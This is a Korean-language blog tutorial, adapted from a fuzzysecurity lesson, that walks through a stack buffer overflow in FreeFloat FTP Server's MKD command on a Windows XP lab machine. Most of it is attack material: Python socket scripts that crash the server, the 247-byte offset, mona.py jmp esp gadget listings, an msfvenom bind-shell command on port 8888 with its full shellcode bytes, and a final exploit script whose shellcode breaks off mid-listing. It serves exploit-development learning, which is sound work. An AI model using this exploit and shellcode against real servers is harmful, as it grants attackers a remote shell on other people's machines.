Window Application Exploit -> Saved Return Pointer Overflows

본 포스팅은 fuzzysecurity Tutorials part 15 -> Saved Return Pointer Overflows를 분석 및 의역하여 작성하였습니다. Windows Application에 존재하는 취약점을 학습하는 데 그 목적이 있습니다.

분석환경

  • Window XP PRO SP3
  • Software: FreeFloat FTP
  • Python
  • Kali linux

 

Step 1. Application

program을 실행시켜보면 port 번호를 설정하고 Start, Stop이 있다.

netstat으로 확인해보면 21번 port가 열려있는 것을 확인할 수 있다. 단순한 server 프로그램이다.

import sys
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.236.128', 21))

print s.recv(1024)

s.send('USER anonymous\r\n')
print s.recv(1024)

s.send('PASS anonymous\r\n')
print s.recv(1024)

s.send('PWD\r\n')
print s.recv(1024)

s.send('LIST\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close

Socket을 이용해 21번 port에 연결하는 python code를 작성했다. 명령어는 FTP server에 대한 명령어를 code에 썼다.

처음 연결이 되면 “USER”, “PASS” 명령어를 사용해 정보를 보내고 나머지 여러 명령어들을 실행시켜보았다.

 

step 2. Application 취약점

나타난 취약점은 ‘MKD string’, 즉 directory를 만들 때 넣는 directory name은 stack 공간에 들어가게 되는데 입력한 directory name이 길이에 대한 필터링을 거치지 않아 return address를 덮을 수 있다.

import sys
import socket

evil = "A" * 0x300

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.236.128', 21))

print s.recv(1024)

s.send('USER anonymous\r\n')
print s.recv(1024)

s.send('PASS anonymous\r\n')
print s.recv(1024)

s.send('PWD\r\n')
print s.recv(1024)

s.send('MKD ' + evil + '\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close

“A”를 0x300개를 directory name으로 보내는 exploit code이다.

해당 실행결과를 보면 오류 정보의 Offset에 0x41414141로 나와있다. “A”를 많이 넣어 return address 공간을 “AAAA”로 덮어 생긴 결과이다.

Debugger로 정확한 확인을 해보았더니 EIP가 0x41414141로 변조되어 있다. 변조되는 사실은 알았으니 return address까지의 offset을 알아야 한다.

Kali linux를 이용해 pattern을 만들었다.

만든 pattern을 exploit code에 넣고 실행시켜보면 EIP가 0x69413269로 나오고 offset 확인을 해보면 247bytes라는 것을 알 수 있다.

 

Step 3. Exploit

Offset은 알았지만 Return Address를 어떤 주소로 덮을지를 알아야 한다. 그리고 shellcode를 넣었다 하더라도 주소를 모르기 때문에 다른 방법을 생각해야 한다. 우린 jmp esp gadget을 이용할 것이다.

mona.py plugin을 이용해서 jmp esp gadget을 찾아야 한다.

Module info :
----------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x7c800000 | 0x7c930000 | 0x00130000 | False | True | False | False | True | 5.1.2600.5512 [kernel32.dll] (C:\WINDOWS\system32\kernel32.dll)
0x77bc0000 | 0x77c18000 | 0x00058000 | False | True | False | False | True | 7.0.2600.5512 [msvcrt.dll] (C:\WINDOWS\system32\msvcrt.dll)
0x7c930000 | 0x7c9cb000 | 0x0009b000 | False | True | False | False | True | 5.1.2600.5512 [ntdll.dll] (C:\WINDOWS\system32\ntdll.dll)
0x719c0000 | 0x719c8000 | 0x00008000 | False | True | False | False | True | 5.1.2600.5512 [wshtcpip.dll] (C:\WINDOWS\System32\wshtcpip.dll)
0x73f80000 | 0x73feb000 | 0x0006b000 | False | True | False | False | True | 1.0420.2600.5512 [USP10.dll] (C:\WINDOWS\system32\USP10.dll)
0x77ef0000 | 0x77f01000 | 0x00011000 | False | True | False | False | True | 5.1.2600.5512 [Secur32.dll] (C:\WINDOWS\system32\Secur32.dll)
0x719d0000 | 0x719d8000 | 0x00008000 | False | True | False | False | True | 5.1.2600.5512 [WS2HELP.dll] (C:\WINDOWS\system32\WS2HELP.dll)
0x76970000 | 0x76aad000 | 0x0013d000 | False | True | False | False | True | 5.1.2600.5512 [ole32.dll] (C:\WINDOWS\system32\ole32.dll)
0x77e70000 | 0x77ee6000 | 0x00076000 | False | True | False | False | True | 6.00.2900.5512 [SHLWAPI.dll] (C:\WINDOWS\system32\SHLWAPI.dll)
0x65cb0000 | 0x65d06000 | 0x00056000 | False | True | False | False | True | 5.1.2600.5512 [hnetcfg.dll] (C:\WINDOWS\system32\hnetcfg.dll)
0x77cf0000 | 0x77d80000 | 0x00090000 | False | True | False | False | True | 5.1.2600.5512 [USER32.dll] (C:\WINDOWS\system32\USER32.dll)
0x62340000 | 0x62349000 | 0x00009000 | False | True | False | False | True | 5.1.2600.5512 [LPK.DLL] (C:\WINDOWS\system32\LPK.DLL)
0x00400000 | 0x0040f000 | 0x0000f000 | False | False | False | False | False | -1.0- [FTPServer.exe] (C:\Documents and Settings\Administrator\바탕 화면\fuzzysecurity\687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver\Win32\FTPServer.exe)
0x5a480000 | 0x5a4b8000 | 0x00038000 | False | True | False | False | True | 6.00.2900.5512 [uxtheme.dll] (C:\WINDOWS\system32\uxtheme.dll)
0x7d5a0000 | 0x7dd9d000 | 0x007fd000 | False | True | False | False | True | 6.00.2900.5512 [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)
0x77d80000 | 0x77e12000 | 0x00092000 | False | True | False | False | True | 5.1.2600.5512 [RPCRT4.dll] (C:\WINDOWS\system32\RPCRT4.dll)
0x4b540000 | 0x4b55a000 | 0x0001a000 | False | True | False | False | True | 6.1.2600.3 [imekr61.ime] (C:\WINDOWS\system32\imekr61.ime)
0x77160000 | 0x77263000 | 0x00103000 | False | True | False | False | True | 6.0 [comctl32.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x762e0000 | 0x762fd000 | 0x0001d000 | False | True | False | False | True | 5.1.2600.5512 [IMM32.DLL] (C:\WINDOWS\system32\IMM32.DLL)
0x75110000 | 0x7513e000 | 0x0002e000 | False | True | False | False | True | 5.1.2600.5512 [msctfime.ime] (C:\WINDOWS\system32\msctfime.ime)
0x74660000 | 0x746ac000 | 0x0004c000 | False | True | False | False | True | 5.1.2600.5512 [MSCTF.dll] (C:\WINDOWS\system32\MSCTF.dll)
0x71980000 | 0x719bf000 | 0x0003f000 | False | True | False | False | True | 5.1.2600.5512 [mswsock.dll] (C:\WINDOWS\system32\mswsock.dll)
0x77e20000 | 0x77e69000 | 0x00049000 | False | True | False | False | True | 5.1.2600.5512 [GDI32.dll] (C:\WINDOWS\system32\GDI32.dll)
0x77f50000 | 0x77ff8000 | 0x000a8000 | False | True | False | False | True | 5.1.2600.5512 [ADVAPI32.dll] (C:\WINDOWS\system32\ADVAPI32.dll)
0x719e0000 | 0x719f7000 | 0x00017000 | False | True | False | False | True | 5.1.2600.5512 [WS2_32.dll] (C:\WINDOWS\system32\WS2_32.dll)
----------------------------------------------------------------------------------------------------------------------------------
0x7c86467b : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x719c1c8b : jmp esp | {PAGE_EXECUTE_READ} [wshtcpip.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\System32\wshtcpip.dll)
0x769e9bff : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769ea930 : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a3996b : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a5068d : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x77ebb227 : jmp esp | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x65ceb24f : jmp esp | {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
0x77d09353 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d256f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d35af7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d3b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x7d5b30d7 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b30eb : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b30ff : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b313b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b314f : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3163 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b318b : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b319f : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31b3 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31c7 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31db : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31ef : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3203 : jmp esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3217 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d71fa1e : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d728eed : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x77d9560a : jmp esp | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x77da025b : jmp esp | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x771836f8 : jmp esp | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x74691873 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
0x77e41d2f : jmp esp | {PAGE_EXECUTE_READ} [GDI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\GDI32.dll)
0x77f6f049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f7965b : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f98063 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77fa3b63 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77fc2a9f : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x7c8369f0 : call esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x7c868667 : call esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x7c944663 : call esp | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x7c98311b : call esp | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x76996cca : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769d9622 : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769fe37b : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a1120b : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x7d5b30e3 : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d647ed3 : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d68f81b : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d6b0672 : call esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d72183c : call esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7469d20f : call esp | {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
0x719a8d3f : call esp | {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
0x77f6effc : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f6f0b2 : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f98153 : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f9c23b : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x719ef8fb : call esp | {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)
0x77c01025 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5512 (C:\WINDOWS\system32\msvcrt.dll)
0x7c949db0 : push esp # ret | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x76981594 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76983624 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769c0b4e : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a6dd4e : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a93995 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x77e7c62b : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e7c77f : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e84ba3 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e91d86 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e91e8c : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77ebd3a8 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x5a496aeb : push esp # ret | {PAGE_EXECUTE_READ} [uxtheme.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\uxtheme.dll)
0x7d5c56ad : push esp # ret | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x77dc6955 : push esp # ret | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x77163be9 : push esp # ret | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x7718c390 : push esp # ret | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x7511e436 : push esp # ret | {PAGE_EXECUTE_READ} [msctfime.ime] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\msctfime.ime)
0x719951a5 : push esp # ret | {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
0x77f51758 : push esp # ret | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x719e2b53 : push esp # ret | {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)

mona.py를 이용해 !mona jmp -r esp 명령어를 치게 되면 log 창에 위와 같이 gadget들을 찾아주게 된다. 0x7c86467b에 있는 gadget을 쓰자. Kernel32.dll에 있는 gadget이고 SafeSEH, OS dll이 걸려있는 주소지만 xp이기 때문에 신경쓰지 않아도 된다.

jmp esp 부분에서 esp가 가리키는 부분을 보면 “nd not understood” 부분의 주소를 가리키고 있다.

강제로 진행시키게 되면 string data가 어셈블리처럼 읽혀져 이상한 code를 실행하게 된다.

그렇다면 저 주소에 NOP Sled를 넣고 Shellcode를 넣어주면 실행될 것이다.

root@kali:~# msfvenom -p windows/shell_bind_tcp LPORT=8888 -b '\x0D\x0A\x00' -f c
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
unsigned char buf[] =
"\xdb\xd3\xd9\x74\x24\xf4\xbd\x8a\x2b\xae\xbb\x58\x2b\xc9\xb1"
"\x53\x31\x68\x17\x83\xc0\x04\x03\xe2\x38\x4c\x4e\x0e\xd6\x12"
"\xb1\xee\x27\x73\x3b\x0b\x16\xb3\x5f\x58\x09\x03\x2b\x0c\xa6"
"\xe8\x79\xa4\x3d\x9c\x55\xcb\xf6\x2b\x80\xe2\x07\x07\xf0\x65"
"\x84\x5a\x25\x45\xb5\x94\x38\x84\xf2\xc9\xb1\xd4\xab\x86\x64"
"\xc8\xd8\xd3\xb4\x63\x92\xf2\xbc\x90\x63\xf4\xed\x07\xff\xaf"
"\x2d\xa6\x2c\xc4\x67\xb0\x31\xe1\x3e\x4b\x81\x9d\xc0\x9d\xdb"
"\x5e\x6e\xe0\xd3\xac\x6e\x25\xd3\x4e\x05\x5f\x27\xf2\x1e\xa4"
"\x55\x28\xaa\x3e\xfd\xbb\x0c\x9a\xff\x68\xca\x69\xf3\xc5\x98"
"\x35\x10\xdb\x4d\x4e\x2c\x50\x70\x80\xa4\x22\x57\x04\xec\xf1"
"\xf6\x1d\x48\x57\x06\x7d\x33\x08\xa2\xf6\xde\x5d\xdf\x55\xb7"
"\x92\xd2\x65\x47\xbd\x65\x16\x75\x62\xde\xb0\x35\xeb\xf8\x47"
"\x39\xc6\xbd\xd7\xc4\xe9\xbd\xfe\x02\xbd\xed\x68\xa2\xbe\x65"
"\x68\x4b\x6b\x13\x60\xea\xc4\x06\x8d\x4c\xb5\x86\x3d\x25\xdf"
"\x08\x62\x55\xe0\xc2\x0b\xfe\x1d\xed\x11\x47\xa8\x0b\x3f\xa7"
"\xfd\x84\xd7\x05\xda\x1c\x40\x75\x08\x35\xe6\x3e\x5a\x82\x09"
"\xbf\x48\xa4\x9d\x34\x9f\x70\xbc\x4a\x8a\xd0\xa9\xdd\x40\xb1"
"\x98\x7c\x54\x98\x4a\x1c\xc7\x47\x8a\x6b\xf4\xdf\xdd\x3c\xca"
"\x29\x8b\xd0\x75\x80\xa9\x28\xe3\xeb\x69\xf7\xd0\xf2\x70\x7a"
"\x6c\xd1\x62\x42\x6d\x5d\xd6\x1a\x38\x0b\x80\xdc\x92\xfd\x7a"
"\xb7\x49\x54\xea\x4e\xa2\x67\x6c\x4f\xef\x11\x90\xfe\x46\x64"
"\xaf\xcf\x0e\x60\xc8\x2d\xaf\x8f\x03\xf6\xdf\xc5\x09\x5f\x48"
"\x80\xd8\xdd\x15\x33\x37\x21\x20\xb0\xbd\xda\xd7\xa8\xb4\xdf"
"\x9c\x6e\x25\x92\x8d\x1a\x49\x01\xad\x0e";

Kali linux로 binding shellcode를 만들어주고 code에 추가시켰다. 그리고 Application을 실행시킨 뒤 code를 실행시키면 된다.

#!/usr/bin/python

import socket
import sys
import struct

buf = ""
buf += "\xb8\x9f\xad\x1b\x95\xda\xd2\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x53\x31\x45\x12\x83\xc5\x04\x03\xda\xa3\xf9"
buf += "\x60\x18\x53\x7f\x8a\xe0\xa4\xe0\x02\x05\x95\x20\x70"
buf += "\x4e\x86\x90\xf2\x02\x2b\x5a\x56\xb6\xb8\x2e\x7f\xb9"
buf += "\x09\x84\x59\xf4\x8a\xb5\x9a\x97\x08\xc4\xce\x77\x30"
buf += "\x07\x03\x76\x75\x7a\xee\x2a\x2e\xf0\x5d\xda\x5b\x4c"
buf += "\x5e\x51\x17\x40\xe6\x86\xe0\x63\xc7\x19\x7a\x3a\xc7"
buf += "\x98\xaf\x36\x4e\x82\xac\x73\x18\x39\x06\x0f\x9b\xeb"
buf += "\x56\xf0\x30\xd2\x56\x03\x48\x13\x50\xfc\x3f\x6d\xa2"
buf += "\x81\x47\xaa\xd8\x5d\xcd\x28\x7a\x15\x75\x94\x7a\xfa"
buf += "\xe0\x5f\x70\xb7\x67\x07\x95\x46\xab\x3c\xa1\xc3\x4a"
buf += "\x92\x23\x97\x68\x36\x6f\x43\x10\x6f\xd5\x22\x2d\x6f"
buf += "\xb6\x9b\x8b\xe4\x5b\xcf\xa1\xa7\x33\x3c\x88\x57\xc4"
buf += "\x2a\x9b\x24\xf6\xf5\x37\xa2\xba\x7e\x9e\x35\xbc\x54"
buf += "\x66\xa9\x43\x57\x97\xe0\x87\x03\xc7\x9a\x2e\x2c\x8c"
buf += "\x5a\xce\xf9\x39\x52\x69\x52\x5c\x9f\xc9\x02\xe0\x0f"
buf += "\xa2\x48\xef\x70\xd2\x72\x25\x19\x7b\x8f\xc6\x07\xc4"
buf += "\x06\x20\x2d\x24\x4f\xfa\xd9\x86\xb4\x33\x7e\xf8\x9e"
buf += "\x6b\xe8\xb1\xc8\xac\x17\x42\xdf\x9a\x8f\xc9\x0c\x1f"
